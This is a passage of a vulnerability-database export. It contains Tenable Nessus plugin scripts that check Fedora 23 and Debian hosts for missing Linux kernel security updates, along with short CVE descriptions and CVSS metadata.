exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"kernel-4.3.3-301.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-06T14:17:18", "description": "Backported i915, networking, and nouveau fixes tagged for stable from 4.4 upstream. Assorted fixes elsewhere. ---- A few bug fixes and backports of all the i915 patches queued for stable from 4.4. ---- A number of fixes across the tree\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-03-04T00:00:00", "type": "nessus", "title": "Fedora 23 : kernel-4.3.3-303.fc23 (2016-b59fd603be)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7513", "CVE-2015-7566", "CVE-2016-0728"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-B59FD603BE.NASL", "href": "https://www.tenable.com/plugins/nessus/89600", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-b59fd603be.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89600);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-7513\", \"CVE-2015-7566\", \"CVE-2016-0728\");\n script_xref(name:\"FEDORA\", value:\"2016-b59fd603be\");\n\n script_name(english:\"Fedora 23 : kernel-4.3.3-303.fc23 (2016-b59fd603be)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Backported i915, networking, and nouveau fixes tagged for stable from\n4.4 upstream. Assorted fixes elsewhere. ---- A few bug fixes and\nbackports of all the i915 patches queued for stable from 4.4. ---- A\nnumber of fixes across the tree\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1284847\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1296466\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1297475\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-January/176194.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6c84e8fb\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"kernel-4.3.3-303.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-06T14:11:35", "description": "Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation or denial-of-service.\n\n - CVE-2013-4312 Tetsuo Handa discovered that it is possible for a process to open far more files than the process' limit leading to denial-of-service conditions.\n\n - CVE-2015-7566 Ralf Spenneberg of OpenSource Security reported that the visor driver crashes when a specially crafted USB device without bulk-out endpoint is detected.\n\n - CVE-2015-8767 An SCTP denial-of-service was discovered which can be triggered by a local attacker during a heartbeat timeout event after the 4-way handshake.\n\n - CVE-2016-0723 A use-after-free vulnerability was discovered in the TIOCGETD ioctl. A local attacker could use this flaw for denial-of-service.\n\n - CVE-2016-0728 The Perception Point research team discovered a use-after-free vulnerability in the keyring facility, possibly leading to local privilege escalation.", "cvss3": {}, "published": "2016-01-20T00:00:00", "type": "nessus", "title": "Debian DSA-3448-1 : linux - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4312", "CVE-2015-7566", "CVE-2015-8767", "CVE-2016-0723", "CVE-2016-0728"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:linux", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3448.NASL", "href": "https://www.tenable.com/plugins/nessus/87995", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3448. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87995);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-4312\", \"CVE-2015-7566\", \"CVE-2015-8767\", \"CVE-2016-0723\", \"CVE-2016-0728\");\n script_xref(name:\"DSA\", value:\"3448\");\n\n script_name(english:\"Debian DSA-3448-1 : linux - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation or denial-of-service.\n\n - CVE-2013-4312\n Tetsuo Handa discovered that it is possible for a\n process to open far more files than the process' limit\n leading to denial-of-service conditions.\n\n - CVE-2015-7566\n Ralf Spenneberg of OpenSource Security reported that the\n visor driver crashes when a specially crafted USB device\n without bulk-out endpoint is detected.\n\n - CVE-2015-8767\n An SCTP denial-of-service was discovered which can be\n triggered by a local attacker during a heartbeat timeout\n event after the 4-way handshake.\n\n - CVE-2016-0723\n A use-after-free vulnerability was discovered in the\n TIOCGETD ioctl. A local attacker could use this flaw for\n denial-of-service.\n\n - CVE-2016-0728\n The Perception Point research team discovered a\n use-after-free vulnerability in the keyring facility,\n possibly leading to local privilege escalation.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2013-4312\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-7566\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-8767\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-0723\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-0728\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/linux\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3448\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the linux packages.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 3.16.7-ckt20-1+deb8u3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"linux-compiler-gcc-4.8-arm\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-compiler-gcc-4.8-x86\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-compiler-gcc-4.9-x86\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-doc-3.16\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-586\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-686-pae\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all-amd64\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all-armel\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all-armhf\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all-i386\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-amd64\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-armmp\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-armmp-lpae\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-common\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-ixp4xx\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-kirkwood\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-orion5x\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-versatile\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-586\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-686-pae\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-686-pae-dbg\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-amd64\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-amd64-dbg\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-armmp\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-armmp-lpae\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-ixp4xx\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-kirkwood\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-orion5x\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-versatile\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-libc-dev\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-manual-3.16\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-source-3.16\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-support-3.16.0-9\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"xen-linux-system-3.16.0-9-amd64\", reference:\"3.16.7-ckt20-1+deb8u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:20:43", "description": "This update fixes the CVEs described below.\n\nCVE-2015-7566\n\nRalf Spenneberg of OpenSource Security reported that the visor driver crashes when a specially crafted USB device without bulk-out endpoint is detected.\n\nCVE-2015-8767\n\nAn SCTP denial of service was discovered which can be triggered by a local attacker during a heartbeat timeout event after the 4-way handshake.\n\nCVE-2015-8785\n\nIt was discovered that local users permitted to write to a file on a FUSE filesystem could cause a denial of service (unkillable loop in the kernel).\n\nCVE-2016-0723\n\nA use-after-free vulnerability was discovered in the TIOCGETD ioctl. A local attacker could use this flaw for denial of service.\n\nCVE-2016-2069\n\nAndy Lutomirski discovered a race condition in flushing of the TLB when switching tasks. On an SMP system this could possibly lead to a crash, information leak or privilege escalation.\n\nFor the oldoldstable distribution (squeeze), these problems have been fixed in version 2.6.32-48squeeze19. Additionally, this version includes upstream stable update 2.6.32.70. This is the final update to the linux-2.6 package for squeeze.\n\nFor the oldstable distribution (wheezy), these problems will be fixed soon.\n\nFor the stable distribution (jessie), CVE-2015-7566, CVE-2015-8767 and CVE-2016-0723 were fixed in linux version 3.16.7-ckt20-1+deb8u3 and the remaining problems will be fixed soon.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-02-08T00:00:00", "type": "nessus", "title": "Debian DLA-412-1 : linux-2.6 security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7566", "CVE-2015-8767", "CVE-2015-8785", "CVE-2016-0723", "CVE-2016-2069"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:firmware-linux-free", "p-cpe:/a:debian:debian_linux:linux-base", "p-cpe:/a:debian:debian_linux:linux-doc-2.6.32", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-486", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-686", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-686-bigmem", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-all", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-all-amd64", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-all-i386", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-amd64", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common-openvz", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common-vserver", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common-xen", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-openvz-686", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-openvz-amd64", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-vserver-686", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-vserver-686-bigmem", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-vserver-amd64", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-xen-686", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-xen-amd64", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-486", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-686", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-686-bigmem", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-686-bigmem-dbg", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-amd64", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-amd64-dbg", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-686", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-686-dbg", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-amd64", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-amd64-dbg", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-686", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-686-bigmem", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-686-bigmem-dbg", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-amd64", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-amd64-dbg", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-686", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-686-dbg", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-amd64", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-amd64-dbg", "p-cpe:/a:debian:debian_linux:linux-libc-dev", "p-cpe:/a:debian:debian_linux:linux-manual-2.6.32", "p-cpe:/a:debian:debian_linux:linux-patch-debian-2.6.32", "p-cpe:/a:debian:debian_linux:linux-source-2.6.32", "p-cpe:/a:debian:debian_linux:linux-support-2.6.32-5", "p-cpe:/a:debian:debian_linux:linux-tools-2.6.32", "p-cpe:/a:debian:debian_linux:xen-linux-system-2.6.32-5-xen-686", "p-cpe:/a:debian:debian_linux:xen-linux-system-2.6.32-5-xen-amd64", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DLA-412.NASL", "href": "https://www.tenable.com/plugins/nessus/88600", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-412-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88600);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-7566\", \"CVE-2015-8767\", \"CVE-2015-8785\", \"CVE-2016-0723\", \"CVE-2016-2069\");\n\n script_name(english:\"Debian DLA-412-1 : linux-2.6 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the CVEs described below.\n\nCVE-2015-7566\n\nRalf Spenneberg of OpenSource Security reported that the visor driver\ncrashes when a specially crafted USB device without bulk-out endpoint\nis detected.\n\nCVE-2015-8767\n\nAn SCTP denial of service was discovered which can be triggered by a\nlocal attacker during a heartbeat timeout event after the 4-way\nhandshake.\n\nCVE-2015-8785\n\nIt was discovered that local users permitted to write to a file on a\nFUSE filesystem could cause a denial of service (unkillable loop in\nthe kernel).\n\nCVE-2016-0723\n\nA use-after-free vulnerability was discovered in the TIOCGETD ioctl. A\nlocal attacker could use this flaw for denial of service.\n\nCVE-2016-2069\n\nAndy Lutomirski discovered a race condition in flushing of the TLB\nwhen switching tasks. On an SMP system this could possibly lead to a\ncrash, information leak or privilege escalation.\n\nFor the oldoldstable distribution (squeeze), these problems have been\nfixed in version 2.6.32-48squeeze19. Additionally, this version\nincludes upstream stable update 2.6.32.70. This is the final update to\nthe linux-2.6 package for squeeze.\n\nFor the oldstable distribution (wheezy), these problems will be fixed\nsoon.\n\nFor the stable distribution (jessie), CVE-2015-7566, CVE-2015-8767 and\nCVE-2016-0723 were fixed in linux version 3.16.7-ckt20-1+deb8u3 and\nthe remaining problems will be fixed soon.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2016/02/msg00003.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze-lts/linux-2.6\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:firmware-linux-free\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-doc-2.6.32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-486\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-686-bigmem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-all-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-all-i386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common-openvz\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common-vserver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-openvz-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-openvz-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-vserver-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-vserver-686-bigmem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-vserver-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-xen-686\");\n 